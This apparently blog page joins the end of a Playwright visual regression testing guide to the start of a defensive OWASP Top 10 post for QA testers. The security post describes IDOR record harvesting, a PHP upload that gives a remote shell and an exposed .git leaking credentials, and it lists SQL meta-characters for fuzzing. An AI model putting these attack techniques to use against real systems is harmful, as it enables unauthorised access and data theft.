How it works: The expect(page).toHaveScreenshot() assertion is part of Playwright’s test library. Under the hood, it captures the image and then looks for a matching reference image. By default, the baseline image is stored in a folder (next to your test file) with a generated name based on the test title. You can also specify a name or path for the screenshot if needed. Playwright can capture the full page or just the visible viewport; by default it captures the viewport, but you can pass options to toHaveScreenshot or page.screenshot() (like { fullPage: true }) if you want a full-page image.

2. Creating Baseline Images (First Run)

A baseline image (also called a golden image) is the expected appearance of your application’s UI. The first time you run a visual test, you need to establish these baselines. In Playwright, the initial run of toHaveScreenshot (or toMatchSnapshot for images) finds no baseline to compare against. With default settings it writes the new screenshot as the baseline and reports the missing snapshot as an error for that run, so the test only starts passing on the next run.

Typically, you’ll run Playwright tests with a special flag to update snapshots on the first run. For example:

npx playwright test --update-snapshots

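Running with --update-snapshots tells Playwright to treat the current screenshots as the correct baseline. It will save the screenshot files (named after the test unless you pass a name such as homepage.png) in a snapshots folder next to the test (for example, tests/example.spec.js-snapshots/ if your test file is example.spec.js). By default, the saved file names typically also include the project name and the operating system, so a baseline recorded on one platform is not reused on another. These baseline images should be checked into version control so that your team and CI system all use the same references.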

After creating the baselines, future test runs (without the update flag) will compare new screenshots against these saved images. It’s a good practice to review the baseline images to ensure they truly represent the intended design of your application.

3. Pixel-by-Pixel Comparison of Screenshots

Once baselines are in place, Playwright’s test runner will automatically compare new screenshots to the baseline images each time the test runs. This is done pixel-by-pixel to catch any differences. If the new screenshot exactly matches the baseline, the visual test passes. If there are any pixel differences beyond the allowed threshold, the test fails, indicating a visual regression.

Under the hood, Playwright uses an image comparison algorithm (powered by the Pixelmatch library) to detect differences between images. Pixelmatch will compare the two images and identify any pixels that changed (e.g., due to layout shift, color change, etc.). It can also produce a diff image that highlights changed pixels in a contrasting color (often bright red or magenta), making it easy for developers to spot what’s different.

What happens on a difference? If a visual mismatch is found, Playwright will mark the test as failed. The test output will typically indicate how many pixels differed or the percentage difference. It will also save the current screenshot and a diff image in the test output folder (test-results by default). For example, you might see files like homepage-expected.png (a copy of the baseline), homepage-actual.png (new screenshot), and homepage-diff.png (the visual difference overlay). By inspecting these images, you can pinpoint the UI changes. This immediate visual feedback is extremely helpful for debugging: just open the images to see what changed.
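To make the comparison step concrete, here is a minimal sketch of counting differing pixels between two same-sized RGBA buffers. It is a simplified illustration, not the algorithm Playwright or Pixelmatch actually runs (those also weigh perceived color difference and anti-aliasing). The function names countDiffPixels and compareImages are hypothetical.

```javascript
// Simplified illustration: exact RGBA comparison of two same-sized images.
// Each image is a flat array of bytes, 4 per pixel (R, G, B, A).
function countDiffPixels(baseline, actual) {
  if (baseline.length !== actual.length) {
    throw new Error('Images must have the same dimensions');
  }
  let diffPixels = 0;
  for (let i = 0; i < baseline.length; i += 4) {
    const same =
      baseline[i] === actual[i] &&
      baseline[i + 1] === actual[i + 1] &&
      baseline[i + 2] === actual[i + 2] &&
      baseline[i + 3] === actual[i + 3];
    if (!same) diffPixels++;
  }
  return diffPixels;
}

// Hypothetical helper: pass when the number of changed pixels is within the allowance.
function compareImages(baseline, actual, maxDiffPixels = 0) {
  const diffPixels = countDiffPixels(baseline, actual);
  const totalPixels = baseline.length / 4;
  return {
    pass: diffPixels <= maxDiffPixels,
    diffPixels,
    ratio: diffPixels / totalPixels,
  };
}

// A 2x2 white baseline, and a copy whose last pixel turned red.
const baselineImage = new Uint8Array(16).fill(255);
const actualImage = Uint8Array.from(baselineImage);
actualImage.set([255, 0, 0, 255], 12);

console.log(compareImages(baselineImage, actualImage));    // 1 of 4 pixels differs, so pass is false
console.log(compareImages(baselineImage, actualImage, 1)); // allowing 1 pixel makes pass true
```

A real comparator also produces the diff image by painting each mismatching pixel in a highlight color, which this sketch leaves out.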

4. Setting Thresholds for Acceptable Differences

Sometimes, tiny pixel differences can occur that are not true bugs. For instance, anti-aliasing differences between operating systems, minor font rendering changes, or a 1-pixel shift might not be worth failing the test. Playwright allows you to define thresholds or tolerances for image comparisons to avoid false positives.

You can configure a threshold as an option to the toHaveScreenshot assertion (or in your Playwright config). For example, you might allow a small percentage of pixels to differ:

await expect(page).toHaveScreenshot({ maxDiffPixelRatio: 0.001 });

The above would pass the test even if up to 0.1% of pixels differ. Alternatively, you can set an absolute pixel count tolerance with maxDiffPixels, or tune threshold, a value between 0 and 1 that sets how large a color difference within a single pixel is tolerated (0 is the strictest; Playwright’s default is 0.2). For instance:

await expect(page).toHaveScreenshot({ maxDiffPixels: 100 }); // ignore up to 100 pixels

These settings let you fine-tune the sensitivity of visual tests. It’s important to strike a balance: you want to catch real regressions, but not fail the build over insignificant rendering variations. Often, teams start with a small tolerance to account for environment differences. You can define these thresholds globally in the Playwright configuration so they apply to all tests for consistency.
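As a sketch of the global setting described above, the tolerances can live under expect.toHaveScreenshot in playwright.config.js. The numbers here are placeholders to tune for your project, not recommendations.

```javascript
// playwright.config.js
// Tolerances applied to every toHaveScreenshot() call unless a test overrides them.
const config = {
  expect: {
    toHaveScreenshot: {
      maxDiffPixelRatio: 0.001, // allow up to 0.1% of pixels to differ
      threshold: 0.2,           // per-pixel color tolerance, 0 (strict) to 1 (lax)
    },
  },
};

module.exports = config;
```

Options passed directly to an individual toHaveScreenshot call take precedence over these defaults, so a particularly noisy page can still get its own tolerance.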

5. Automation in CI/CD Pipelines

One of the strengths of using Playwright for visual testing is that it integrates smoothly into continuous integration (CI) workflows. You can run your Playwright visual tests on your CI server (Jenkins, GitHub Actions, GitLab CI, etc.) as part of every build or deployment. This way, any visual regression will automatically fail the pipeline, preventing unintentional UI changes from going live.

In a CI setup, you’ll typically do the following:

- Check in baseline images: Ensure the baseline snapshot folder is part of your repository, so the CI environment has the expected images to compare against.

- Run tests on a consistent environment: To avoid false differences, run the browser in a consistent environment (same resolution, headless mode, same browser version). Generating the baselines on the same operating system as CI, for example inside the same container image, avoids font and anti-aliasing mismatches.

- Update baselines intentionally: When a deliberate UI change is made (for example, a redesign of a component), the visual test will fail because the new screenshot doesn’t match the old baseline. At that point, a team member can review the changes, and if they are expected, re-run the tests with --update-snapshots to update the baseline images to the new look. This update can be part of the same commit or a controlled process.

- Review diffs in pull requests: Visual changes will show up as diffs (image files) in code review. This provides an opportunity for designers or developers to verify that changes are intentional and acceptable.

By automating visual tests in CI/CD, teams get immediate feedback on UI changes. It enforces an additional quality gate: code isn’t merged unless the application looks right. This dramatically reduces the chances of deploying a UI bug to production. It also saves manual QA effort on visual checking.
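One way to keep CI from writing baselines on its own is the updateSnapshots config option. The sketch below assumes your CI provider sets a CI environment variable (many do, but check yours); the reporter choice is likewise only illustrative.

```javascript
// playwright.config.js
// Assumption: the CI provider sets the CI environment variable.
const isCI = Boolean(process.env.CI);

const config = {
  // 'none' never writes snapshot files, so CI cannot create or overwrite baselines.
  // 'missing' (the default) writes a baseline only when none exists yet.
  updateSnapshots: isCI ? 'none' : 'missing',
  // Produce an HTML report in CI so it can be stored as a build artifact.
  reporter: isCI ? [['html', { open: 'never' }]] : 'list',
};

module.exports = config;
```

With this in place, baselines only change when someone runs the update command deliberately and commits the resulting images.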

6. Cross-Browser and Responsive Visual Testing

Web applications need to look correct on various browsers and devices. A big advantage of Playwright is its built-in support for testing in Chromium (Chrome/Edge), WebKit (Safari), and Firefox, as well as the ability to simulate mobile devices. You should leverage this to do visual regression testing across different environments.

With Playwright, you can specify multiple projects or launch contexts in different browser engines. For example, you can run the same visual test in Chrome and Firefox. Each will produce its own set of baseline images (you may namespace them by browser or use Playwright’s project name to separate snapshots). This ensures that a change that affects only a specific browser’s rendering (say a CSS that behaves differently in Firefox) will be caught.

Similarly, you can test responsive layouts by setting the viewport size or emulating a device. For instance, you might have one test run for desktop dimensions and another for a mobile viewport. Playwright can mimic devices like an iPhone or Pixel phone using device descriptors. The screenshots from those runs will validate the mobile UI against mobile baselines.

Tip: When doing cross-browser visual testing, be mindful that different browsers might have slight default rendering differences (like font smoothing). You might need to use slightly higher thresholds or per-browser baseline images. In many cases, if your UI is well-standardized, the snapshots will match closely. Ensuring consistent CSS resets and using web-safe fonts can help minimize differences across browsers.
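A minimal sketch of a multi-browser setup using Playwright projects is shown here. The project names and the phone-sized viewport are illustrative choices; in a real project you may prefer the device presets exported as devices from @playwright/test.

```javascript
// playwright.config.js
// Each project runs the same tests in a different browser engine or viewport.
const config = {
  projects: [
    { name: 'chromium', use: { browserName: 'chromium' } },
    { name: 'firefox', use: { browserName: 'firefox' } },
    { name: 'webkit', use: { browserName: 'webkit' } },
    {
      // Phone-sized viewport; the dimensions are an illustrative choice.
      name: 'mobile-viewport',
      use: { browserName: 'chromium', viewport: { width: 390, height: 844 } },
    },
  ],
};

module.exports = config;
```

Because the project name is part of the default snapshot file name, each project keeps its own baselines without extra configuration.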

7. Debugging and Results Reporting

When a visual test fails, Playwright provides useful output to debug the issue. In the terminal, the test failure message will indicate that the screenshot comparison did not match the expected snapshot. It often mentions how many pixels differed or the percentage difference. More importantly, Playwright saves the images for inspection. By default you’ll get:

- The baseline image (what the UI was expected to look like)

- The actual image from the test run (how the UI looks now)

- A diff image highlighting the differences

You can open these images side-by-side to immediately spot the regression. Additionally, if you use the Playwright HTML reporter or an integrated report in CI, you might see the images directly in the report for convenience.

Because visual differences are easier to understand visually than through logs, debugging usually just means reviewing the images. Once you identify the cause (e.g. a missing CSS file, or an element that moved), you can fix the issue (or approve the change if it was intentional). Then update the baseline if needed and re-run tests.

Playwright’s logs will also show the test step where the screenshot was taken, which can help correlate which part of your application or which recent commit introduced the change.

Tools and Integrations for Visual Testing

While Playwright has robust built-in visual comparison capabilities, there are additional tools and integrations that can enhance your visual testing workflow:

- Percy – Visual review platform: Percy (now part of BrowserStack) is a popular cloud service for visual testing. You can integrate Percy with Playwright by capturing snapshots in your tests and sending them to Percy’s service. Percy provides a web dashboard where team members can review visual diffs side-by-side, comment on them, and approve or reject changes. It also handles cross-browser rendering in the cloud. This is useful for teams that want a collaborative approval process for UI changes beyond the command-line output. (Playwright + Percy can be achieved via Percy’s SDK or CLI tools that work with any web automation).

- Applitools Eyes – AI-powered visual testing: Applitools is another platform that specializes in visual regression testing and uses AI to detect differences in a smarter way (ignoring certain dynamic content, handling anti-aliasing, etc.). Applitools has an SDK that can be used with Playwright. In your tests, you would open Applitools Eyes, take snapshots, and Eyes will upload those screenshots to its Ultrafast Grid for comparison across multiple browsers and screen sizes. The results are viewed on Applitools dashboard, with differences highlighted. This tool is known for features like intelligent region ignoring and visual AI assertions.

- Pixelmatch – Image comparison library: Pixelmatch is the open-source library that Playwright uses under the hood for comparing images. If you want to perform custom image comparisons or generate diff images yourself, you could use Pixelmatch in a Node script. However, in most cases you won’t need to interact with it directly since Playwright’s expect assertions already leverage it.

- jest-image-snapshot – Jest integration: Before Playwright had built-in screenshot assertions, a common approach was to use Jest with the jest-image-snapshot library. This library also uses Pixelmatch and provides a nice API to compare images in tests. If you are using Playwright through Jest (instead of Playwright’s own test runner), you can use expect(image).toMatchImageSnapshot(). However, if you use @playwright/test, it has its own toMatchSnapshot method for images. Essentially, Playwright’s own solution was inspired by jest-image-snapshot.

- CI Integrations – GitHub Actions and others: There are community actions and templates to run Playwright visual tests on CI and upload artifacts (like diff images) for easier viewing. For instance, you could configure your CI to comment on a pull request with a link to the diff images when a visual test fails. Some cloud providers (like BrowserStack, LambdaTest) also offer integrations to run Playwright tests on their infrastructure and manage baseline images.

Using these tools is optional but can streamline large-scale visual testing, especially for teams with many baseline images or the need for cross-team collaboration on UI changes. If you’re just starting out, Playwright’s built-in capabilities might be enough. As your project grows, you can consider adding a service like Percy or Applitools for a more managed approach.

Code Example: Visual Testing in Action

To solidify the concepts, let’s look at a slightly more involved code example using Playwright’s snapshot testing. In this example, we will navigate to a page, wait for an element, take a screenshot, and compare it to a baseline image:

    // visual.spec.js
    const { test, expect } = require('@playwright/test');

    test('Playwright homepage visual test', async ({ page }) => {
      // Navigate to the Playwright homepage
      await page.goto('https://playwright.dev/');

      // Wait for a stable element so the page finishes loading
      await page.waitForSelector('header >> text=Playwright');

      // Capture and compare a full-page screenshot
      // • The first run (with --update-snapshots) saves playwright-home.png
      // • Subsequent runs compare against that baseline
      // The snapshot name is the first argument; options such as fullPage go in the second.
      await expect(page).toHaveScreenshot('playwright-home.png', {
        fullPage: true
      });
    });

Expected output

| Run | What happens | Files created |
| --- | --- | --- |
| First run (with --update-snapshots) | Screenshot is treated as the baseline. Test passes. | tests/visual.spec.js-snapshots/playwright-home.png |
| Later runs | Playwright captures a new screenshot and compares it to playwright-home.png. | If identical: test passes, no new files. If different: test fails and Playwright writes playwright-home-actual.png (current) and playwright-home-diff.png (changes). |

Conclusion:

Playwright visual testing is a powerful technique to ensure your web application’s UI remains consistent and bug-free through changes. By automating screenshot comparisons, you can catch CSS bugs, layout breaks, and visual inconsistencies that might slip past regular tests. We covered how Playwright captures screenshots and compares them to baselines, how you can integrate these tests into your development workflow and CI/CD, and even extend the capability with tools like Percy or Applitools for advanced use cases.

The best way to appreciate the benefits of visual regression testing is to try it out in your own project. Set up Playwright’s test runner, write a couple of visual tests for key pages or components, and run them whenever you make UI changes. You’ll quickly gain confidence that your application looks exactly as intended on every commit. Pixel-perfect interfaces and happy users are within reach!

Frequently Asked Questions

How do I do visual testing in Playwright?

Playwright has built-in support for visual testing through its screenshot assertions. To do visual testing, you write a test that navigates to a page (or renders a component), then use expect(page).toHaveScreenshot() or take a page.screenshot() and use expect().toMatchSnapshot() to compare it against a baseline image. On the first run you create baseline snapshots (using --update-snapshots), and on subsequent runs Playwright will automatically compare and fail the test if the UI has changed. Essentially, you let Playwright capture images of your UI and catch any differences as test failures.

Can Playwright be used with Percy or Applitools for visual testing?

Yes. Playwright can integrate with third-party visual testing services like Percy and Applitools Eyes. For Percy, you can use their SDK or CLI to snapshot pages during your Playwright tests and upload them to Percy’s service, where you get a nice UI to review visual diffs and manage baseline approvals. For Applitools, you can use the Applitools Eyes SDK with Playwright: you replace or supplement Playwright’s built-in comparison with Applitools calls (such as eyes.open, eyes.check, and eyes.close) in your test. These services run comparisons in the cloud and often provide cross-browser screenshots and AI-based difference detection, which can complement Playwright’s local pixel-to-pixel checks.

How do I update baseline snapshots in Playwright?

To update the baseline images (snapshots) in Playwright, rerun your tests with the update flag. For example: npx playwright test --update-snapshots. This will take new screenshots for any failing comparisons and save them as the new baselines. You should do this only after verifying that the visual changes are expected and correct (for instance, after an intentional UI update or fixing a bug). It’s wise to review the diff images or run the tests locally before updating snapshots in your main branch. Once updated, commit the new snapshot images so that future test runs use them.

How can I ignore minor rendering differences in visual tests?

Minor differences (like a 1px shift or slight font anti-aliasing change) can be ignored by setting a tolerance threshold. Playwright’s toHaveScreenshot allows options such as maxDiffPixels or maxDiffPixelRatio to define how much difference is acceptable. For example, expect(page).toHaveScreenshot({ maxDiffPixels: 50 }) would ignore up to 50 differing pixels. You can also adjust threshold for color sensitivity. Another strategy is to apply a consistent CSS (or hide dynamic elements) during screenshot capture – for instance, hide an ad banner or timestamp that changes on every load by injecting CSS before taking the screenshot. This ensures those dynamic parts don’t cause false diffs.

Does Playwright Visual Testing support comparing specific elements or only full pages?

You can compare specific elements as well. Playwright’s toHaveScreenshot can be used on a locator in addition to the full page. For example: await expect(page.locator('.header')).toHaveScreenshot(); will capture a screenshot of just the element matching .header and compare it. This is useful if you want to isolate a particular component’s appearance. You can also manually do const elementShot = await element.screenshot() (where element is a locator) and then expect(elementShot).toMatchSnapshot('element.png'). So, Playwright supports both full-page and element-level visual comparisons.

by Rajesh K | May 6, 2025 | Security Testing, Blog, Featured, Latest Post |

Web applications are now at the core of business operations, from e-commerce and banking to healthcare and SaaS platforms. As industries increasingly rely on web apps to deliver value and engage users, the security stakes have never been higher. Cyberattacks targeting these applications are on the rise, often exploiting well-known and preventable vulnerabilities. The consequences can be devastating: massive data breaches, system compromises, and reputational damage that can cripple even the most established organizations. Understanding these vulnerabilities is crucial, and this is where security testing plays a critical role. These risks, especially those highlighted in the OWASP Top 10 Vulnerabilities list, represent the most critical and widespread threats in the modern threat landscape. Testers play a vital role in identifying and mitigating them. By learning how these vulnerabilities work and how to test for them effectively, QA professionals can help ensure that applications are secure before they reach production, protecting both users and the organization.

In this blog, we’ll explore each of the OWASP Top 10 vulnerabilities and how QA testers can be proactive in identifying and addressing these risks to improve the overall security of web applications.

OWASP Top 10 Vulnerabilities:

Broken Access Control

What is Broken Access Control?

Broken access control occurs when a web application fails to enforce proper restrictions on what authenticated users can do. This vulnerability allows attackers to access unauthorised data or perform restricted actions, such as viewing another user’s sensitive information, modifying data, or accessing admin-only functionalities.

Common Causes

- Lack of a “Deny by Default” Policy: Systems that don’t explicitly restrict access unless specified allow unintended access.

- Insecure Direct Object References (IDOR): Attackers manipulate identifiers (e.g., user IDs in URLs) to access others’ data.

- URL Tampering: Users alter URL parameters to bypass restrictions.

- Missing API Access Controls: APIs (e.g., POST, PUT, DELETE methods) lack proper authorization checks.

- Privilege Escalation: Users gain higher permissions, such as acting as administrators.

- CORS Misconfiguration: Incorrect Cross-Origin Resource Sharing settings expose APIs to untrusted domains.

- Force Browsing: Attackers access restricted pages by directly entering URLs.

Real‑World Exploit Example – Unauthorized Account Switch

- Scenario: A multi-tenant SaaS platform exposes a “View Profile” link (https://app.example.com/profile?user_id=326). By simply changing 326 to 327, an attacker views another customer’s billing address and purchase history. This is an Insecure Direct Object Reference (IDOR). The attacker iterates IDs, harvesting thousands of records in under an hour.

- Impact: PCI data is leaked, triggering GDPR fines and mandatory breach disclosure; churn spikes 6% in the following quarter.

- Lesson: Every request must enforce server‑side permission checks; adopt randomized, non‑guessable IDs or UUIDs and automated penetration tests that iterate parameters.

QA Testing Focus – Verify Every Path to Every Resource

- Attempt horizontal and vertical privilege jumps with multiple roles.

- Use OWASP ZAP or Burp Suite repeater to tamper with IDs, cookies, and headers.

- Confirm “deny‑by‑default” is enforced in automated integration tests.

Prevention Strategies

- Implement “Deny by Default”: Restrict access to all resources unless explicitly allowed.

- Centralize Access Control: Use a single, reusable access control mechanism across the application.

- Enforce Ownership Rules: Ensure users can only access their own data.

- Configure CORS Properly: Limit API access to trusted origins.

- Hide Sensitive Files: Prevent public access to backups, metadata, or configuration files (e.g., .git).

- Log and Alert: Monitor access control failures and notify administrators of suspicious activity.

- Rate Limit APIs: Prevent brute-force attempts to exploit access controls.

- Invalidate Sessions: Ensure session IDs are destroyed after logout.

- Use Short-Lived JWTs: For stateless authentication, limit token validity periods.

- Test Regularly: Create unit and integration tests to verify access controls
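
The “deny by default” and ownership rules above can be sketched as a small server-side check. Everything in this example is hypothetical (the in-memory profiles map, the role names, and the function names); a real application would load records from its data store and take the requester from the authenticated session.

```javascript
// Hypothetical in-memory data, for illustration only.
const profiles = new Map([
  [326, { ownerId: 326, billingAddress: '1 Example Street' }],
  [327, { ownerId: 327, billingAddress: '2 Sample Road' }],
]);

// Deny by default: access is granted only when a rule explicitly allows it.
function canViewProfile(requester, profile) {
  if (!requester || !profile) return false;       // unauthenticated or unknown record
  if (requester.role === 'admin') return true;    // explicit admin rule
  return requester.id === profile.ownerId;        // ownership rule
}

// The check runs on the server for every request, whatever ID the URL carries.
function getProfile(requester, userId) {
  const profile = profiles.get(userId);
  if (!canViewProfile(requester, profile)) {
    return { status: 403 };
  }
  return { status: 200, body: profile };
}

const customer = { id: 326, role: 'user' };
console.log(getProfile(customer, 326).status); // own profile is allowed
console.log(getProfile(customer, 327).status); // another customer's profile is refused
```

An integration test can then iterate over IDs with a low-privilege account and assert that every response other than the user’s own record is refused.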

Cryptographic Failures

What are Cryptographic Failures?

Cryptographic failures occur when sensitive data is not adequately protected due to missing, weak, or improperly implemented encryption. This exposes data like passwords, credit card numbers, or health records to attackers.

Common Causes

- Plain Text Transmission: Sending sensitive data over HTTP instead of HTTPS.

- Outdated Algorithms: Using weak or deprecated algorithms and protocols such as MD5, SHA-1, or TLS 1.0/1.1.

- Hard-Coded Secrets: Storing keys or passwords in source code.

- Weak Certificate Validation: Failing to verify server certificates, enabling man-in-the-middle attacks.

- Poor Randomness: Using low-entropy random number generators for encryption.

- Weak Password Hashing: Storing passwords with fast, unsalted hashes like SHA256.

- Leaking Error Messages: Exposing cryptographic details in error responses.

- Database-Only Encryption: Relying on automatic decryption in databases, vulnerable to injection attacks.

Real‑World Exploit Example – Wi‑Fi Sniffing Exposes Logins

- Scenario: A booking site still serves its login page over http:// for legacy browsers. On airport Wi‑Fi, an attacker runs Wireshark, captures plaintext credentials, and later logs in as the CFO.

- Impact: Travel budget data and stored credit‑card tokens are exfiltrated; attackers launch spear‑phishing emails using real itineraries.

- Lesson: Enforce HSTS, redirect all HTTP traffic to HTTPS, enable Perfect Forward Secrecy, and pin certificates in the mobile app.

QA Testing Focus – Inspect the Crypto Posture

- Run SSL Labs to flag deprecated ciphers and protocols.

- Confirm secrets aren’t hard‑coded in repos.

- Validate that password hashes use Argon2/Bcrypt with unique salts.

Prevention Strategies

- Use HTTPS with TLS 1.3: Ensure all data is encrypted in transit.

- Adopt Strong Algorithms: Use AES for encryption and bcrypt, Argon2, or scrypt for password hashing.

- Avoid Hard-Coding Secrets: Store keys in secure vaults or environment variables.

- Validate Certificates: Enforce strict certificate checks to prevent man-in-the-middle attacks.

- Use Secure Randomness: Employ cryptographically secure random number generators.

- Implement Authenticated Encryption: Combine encryption with integrity checks to detect tampering.

- Remove Unnecessary Data: Minimize sensitive data storage to reduce risk.

- Set Security Headers: Use HTTP Strict-Transport-Security (HSTS) to enforce HTTPS.

- Use Trusted Libraries: Avoid custom cryptographic implementations.
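
As a sketch of salted password hashing with a trusted library, the example below uses scrypt from Node.js’s built-in crypto module. The storage format (salt and hash joined by a colon) and the function names are assumptions made for this illustration; cost parameters are left at Node’s defaults and should be reviewed for production use.

```javascript
const crypto = require('node:crypto');

// Hash a password with scrypt and a unique random salt per password.
function hashPassword(password) {
  const salt = crypto.randomBytes(16);
  const hash = crypto.scryptSync(password, salt, 64);
  // Illustrative storage format: "<salt hex>:<hash hex>"
  return `${salt.toString('hex')}:${hash.toString('hex')}`;
}

// Recompute the hash with the stored salt and compare in constant time.
function verifyPassword(password, stored) {
  const [saltHex, hashHex] = stored.split(':');
  const expected = Buffer.from(hashHex, 'hex');
  const actual = crypto.scryptSync(password, Buffer.from(saltHex, 'hex'), expected.length);
  return crypto.timingSafeEqual(actual, expected);
}

const storedValue = hashPassword('correct horse battery staple');
console.log(verifyPassword('correct horse battery staple', storedValue)); // matches
console.log(verifyPassword('wrong guess', storedValue));                  // does not match
```

Because each password gets its own salt, two users with the same password end up with different stored values, which is something a QA check can assert directly.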

Injection

What is Injection?

Injection vulnerabilities arise when untrusted user input is directly included in commands or queries (e.g., SQL, OS commands) without proper validation or sanitization. This allows attackers to execute malicious code, steal data, or compromise the server.

Common Types

- SQL Injection: Manipulating database queries to access or modify data.

- Command Injection: Executing arbitrary system commands.

- NoSQL Injection: Exploiting NoSQL database queries.

- Cross-Site Scripting (XSS): Injecting malicious scripts into web pages.

- LDAP Injection: Altering LDAP queries to bypass authentication.

- Expression Language Injection: Manipulating server-side templates.

Common Causes

- Unvalidated Input: Failing to check user input from forms, URLs, or APIs.

- Dynamic Queries: Building queries with string concatenation instead of parameterization.

- Trusted Data Sources: Assuming data from cookies, headers, or URLs is safe.

- Lack of Sanitization: Not filtering dangerous characters (e.g., ', ", <, >).

Real‑World Exploit Example – Classic ‘1 = 1’ SQL Bypass

QA Testing Focus – Break It Before Hackers Do

- Fuzz every parameter with SQL meta-characters (' " ; -- /*).

- Inspect API endpoints for parameterised queries.

- Ensure stored procedures or ORM layers are in place.

Prevention Strategies

- Use Parameterized Queries: Avoid string concatenation in SQL or command queries.

- Validate and Sanitize Input: Filter out dangerous characters and validate data types.

- Escape User Input: Apply context-specific escaping for HTML, JavaScript, or SQL.

- Use ORM Frameworks: Leverage Object-Relational Mapping tools to reduce injection risks.

- Implement Allow Lists: Restrict input to expected values.

- Limit Database Permissions: Use least-privilege accounts for database access.

- Enable WAF: Deploy a Web Application Firewall to detect and block injection attempts.
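
To illustrate why parameterized queries matter, the sketch below contrasts a query built by string concatenation with one that keeps the SQL text and the values separate. The users table, its columns, and both function names are hypothetical, and the $1/$2 placeholder style is only one convention; your database driver may use a different one.

```javascript
// Vulnerable: user input is concatenated straight into the SQL text.
function buildLoginQueryUnsafe(username, password) {
  return `SELECT * FROM users WHERE username = '${username}' AND password = '${password}'`;
}

// Safer: the SQL text contains only placeholders; values travel separately,
// so the driver never interprets them as SQL.
function buildLoginQuerySafe(username, password) {
  return {
    text: 'SELECT * FROM users WHERE username = $1 AND password = $2',
    values: [username, password],
  };
}

// Classic always-true payload typed into the password field.
const payload = "' OR '1'='1";

console.log(buildLoginQueryUnsafe('alice', payload));
// The WHERE clause now ends in: password = '' OR '1'='1'

console.log(buildLoginQuerySafe('alice', payload));
// The SQL text is unchanged; the payload stays inside the values array.
```

A tester can use the same payload against a login form or API: if the response differs from an ordinary failed login, the input is probably reaching the query unescaped.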

Insecure Design

What is Insecure Design?

Insecure design refers to flaws in the application’s architecture or requirements that cannot be fixed by coding alone. These vulnerabilities stem from inadequate security considerations during the design phase.

Common Causes

- Lack of Threat Modeling: Failing to identify potential attack vectors during design.

- Missing Security Requirements: Not defining security controls in specifications.

- Inadequate Input Validation: Designing systems that trust user input implicitly.

- Poor Access Control Models: Not planning for proper authorization mechanisms.

Real‑World Exploit Example – Trust‑All File Upload

- Scenario: A marketing CMS offers “Upload your brand assets.” It stores files to /uploads/ and renders them directly. An attacker uploads payload.php, then visits https://cms.example.com/uploads/payload.php, gaining a remote shell.

- Impact: Attackers deface landing pages, plant dropper malware, and steal S3 keys baked into environment variables.

- Lesson: Specify an allow‑list (PNG/JPG/PDF), store files outside the web root, scan uploads with ClamAV, and serve them via a CDN that disallows dynamic execution.
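
The allow-list part of this lesson can be sketched as follows. The function name and the signature table are assumptions made for illustration; the check pairs each permitted extension with the leading bytes that file type is expected to start with, so a script renamed to look like an image is still rejected. It does not replace malware scanning or storing files outside the web root.

```python
from pathlib import PurePosixPath

# Permitted extensions mapped to the leading "magic" bytes of each format.
ALLOWED_SIGNATURES = {
    ".png": b"\x89PNG\r\n\x1a\n",
    ".jpg": b"\xff\xd8\xff",
    ".pdf": b"%PDF-",
}


def is_upload_allowed(filename: str, content: bytes) -> bool:
    """Accept a file only if its extension is allow-listed and its content matches."""
    suffix = PurePosixPath(filename).suffix.lower()
    signature = ALLOWED_SIGNATURES.get(suffix)
    if signature is None:
        return False  # extension is not on the allow list
    return content.startswith(signature)


print(is_upload_allowed("payload.php", b"<?php system($_GET['c']); ?>"))  # False
print(is_upload_allowed("shell.php.png", b"<?php echo 1; ?>"))            # False
print(is_upload_allowed("logo.PNG", b"\x89PNG\r\n\x1a\n" + b"\x00" * 8))  # True
```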

QA Testing Focus – Threat‑Model the Requirements

- Sit in design reviews and ask “What could go wrong?” for each feature.

- Build test cases for negative paths that exploit design assumptions.

Prevention Strategies

- Conduct Threat Modeling: Identify and prioritize risks during the design phase.

- Incorporate Security Requirements: Define controls for authentication, encryption, and access.

- Adopt Secure Design Patterns: Use frameworks with built-in security features.

- Perform Design Reviews: Validate security assumptions with peer reviews.

- Train Developers: Educate teams on secure design principles.

Security Misconfiguration

What is Security Misconfiguration?

Security misconfiguration occurs when systems, frameworks, or servers are improperly configured, exposing vulnerabilities like default credentials, exposed directories, or unnecessary features.

Common Causes

- Default Configurations: Using unchanged default settings or credentials.

- Exposed Debugging: Leaving debug modes enabled in production.

- Directory Listing: Allowing directory browsing on servers.

- Unpatched Systems: Failing to apply security updates.

- Misconfigured Permissions: Overly permissive file or cloud storage settings.

Real‑World Exploit Example – Exposed .git Directory

- Scenario: During a last‑minute hotfix, DevOps copy the repo to a test VM, forget to disable directory listing, and push it live. An attacker downloads /.git/, reconstructs the repo with git checkout, and finds .env containing production DB creds.

- Impact: Database wiped and ransom demand left in a single table; six‑hour outage costs $220 k in SLA penalties.

- Lesson: Automate hardening: block dot‑files, disable directory listing, scan infra with CIS benchmarks during CI/CD.

QA Testing Focus – Scan, Harden, Repeat

- Run Nessus or Nmap for open ports and default services.

- Validate security headers (HSTS, CSP) in responses.

- Verify debug and stack traces are disabled outside dev.
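
The header check in this list is easy to automate. The sketch below assumes the response headers have already been collected into a plain dictionary (for example from whatever HTTP client the test suite uses); the function name and the list of required headers are illustrative choices, and a real suite would likely also validate the header values.

```python
# Headers this hypothetical check expects on every response.
REQUIRED_HEADERS = (
    "Strict-Transport-Security",
    "Content-Security-Policy",
    "X-Frame-Options",
)


def missing_security_headers(headers: dict[str, str]) -> list[str]:
    """Return the required headers that are absent, ignoring name case."""
    present = {name.lower() for name in headers}
    return [name for name in REQUIRED_HEADERS if name.lower() not in present]


response_headers = {
    "Content-Type": "text/html",
    "strict-transport-security": "max-age=63072000",
}
print(missing_security_headers(response_headers))
# ['Content-Security-Policy', 'X-Frame-Options']
```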

Prevention Strategies

- Harden Configurations: Disable unnecessary features and use secure defaults.

- Apply Security Headers: Use HSTS, Content-Security-Policy (CSP), and X-Frame-Options.

- Disable Directory Browsing: Prevent access to file listings.

- Patch Regularly: Keep systems and components updated.

- Audit Configurations: Use tools like Nessus to scan for misconfigurations.

- Use CI/CD Security Checks: Integrate configuration scans into pipelines.

Vulnerable and Outdated Components

What are Vulnerable and Outdated Components?

This risk involves using outdated or unpatched libraries, frameworks, or third-party services that contain known vulnerabilities.

Common Causes

- Unknown Component Versions: Lack of inventory for dependencies.

- Outdated Software: Using unsupported versions of servers, OS, or libraries.

- Delayed Patching: Infrequent updates expose systems to known exploits.

- Unmaintained Components: Relying on unsupported libraries.

Real‑World Exploit Example – Log4Shell Fallout

